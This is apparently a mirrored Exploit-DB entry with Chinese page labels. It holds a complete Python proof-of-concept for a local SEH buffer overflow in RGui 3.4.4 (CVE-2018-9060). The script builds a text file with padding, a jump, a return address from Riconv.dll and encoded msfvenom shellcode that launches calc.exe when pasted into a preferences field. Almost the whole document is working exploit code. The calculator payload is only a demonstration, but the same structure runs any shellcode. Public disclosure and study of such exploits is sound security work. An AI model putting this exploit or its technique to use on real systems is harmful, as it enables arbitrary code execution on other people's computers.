RGui 3.4.4 – Local Buffer Overflow

• Exploit Database
• 14 阅读

• 作者： bzyo
  日期： 2018-04-24
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44516/

• #!/usr/bin/python
  
  #
  # Exploit Author: bzyo
  # CVE: CVE-2018-9060
  # Twitter: @bzyo_
  # Exploit Title: R 3.4.4 - Local Buffer Overflow
  # Date: 03-27-2018
  # Vulnerable Software: R 3.4.4
  # Vendor Homepage: https://www.r-project.org/
  # Version: 3.4.4
  # Software Link: https://cloud.r-project.org/bin/windows/
  # Tested On: Windows 7 x86
  #
  # Timeline:
  # 03-27-18: Emailed author, no response
  # 04-03-18: Emailed author, no response
  # 04-10-18: Emailed author, no response
  # 04-23-18: New version released; Submitted public disclosure
  #
  # lots of bad chars, use alpha_mixed
  # badchars \x00\x0a\x0d\x0e and \x80 through \xbf
  #
  #
  # PoC: 
  # 1. generate r344.txt, copy contents to clipboard
  # 2. open app, select Edit, select 'GUI preferences'
  # 3. paste r344.txt contents into 'Language for menus and messages'
  # 4. select OK
  # 5. pop calc
  #
  
  
  filename="r344.txt"
  
  junk = "A"*900
  
  #jump 6
  nseh = "\xeb\x06\xcc\xcc"
  
  #0x643c17af : pop esi # pop edi # ret|{PAGE_EXECUTE_READ} [Riconv.dll]
  seh = "\xaf\x17\x3c\x64"
  
  #msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
  #Payload size: 448 bytes
  calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
  "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
  "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
  "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
  "\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
  "\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
  "\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
  "\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
  "\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
  "\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
  "\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
  "\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
  "\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
  "\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
  "\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
  "\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
  "\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
  "\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
  "\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
  "\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
  "\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
  "\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
  "\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
  "\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
  "\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
  "\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
  "\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
  "\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
  "\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
  "\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")
  
  fill = "D"*8000
  
  buffer = junk + nseh + seh + calc + fill
  
  textfile = open(filename , 'w')
  textfile.write(buffer)
  textfile.close()